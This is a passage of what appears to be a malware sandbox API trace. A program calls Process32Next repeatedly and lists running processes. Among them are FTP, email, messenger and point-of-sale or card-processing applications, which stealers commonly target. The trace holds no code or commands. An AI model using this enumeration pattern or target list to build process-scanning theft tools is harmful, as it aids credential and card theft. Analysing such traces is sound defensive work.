hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.015] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.017] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.019] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0282.021] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0282.023] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0282.025] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.062] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.064] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0282.066] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.068] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.070] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.072] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.078] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.080] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.082] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.084] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0282.086] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0282.088] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0282.093] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.095] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0282.097] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0282.099] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0282.101] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0282.103] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0282.156] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.158] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0282.160] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0282.162] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.164] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0282.166] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0282.173] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0282.175] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0282.177] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0282.179] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0282.181] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0282.186] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0282.188] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0282.190] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0282.193] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0282.195] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0282.197] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0282.248] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0282.250] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0282.252] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0282.253] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0282.255] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0282.256] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0282.258] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0282.260] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0282.264] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0282.266] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0282.267] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0282.269] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0282.270] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0282.272] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0282.274] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0282.279] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0282.281] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0282.283] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0282.285] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0282.286] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0282.288] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0282.290] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0282.342] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0282.344] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0282.346] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0282.348] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0282.349] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0282.351] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0282.353] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0282.357] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0282.359] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0282.361] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0282.363] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0282.365] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0282.367] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0282.369] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0282.373] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0282.375] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0282.377] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0282.379] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0282.380] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0282.382] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) 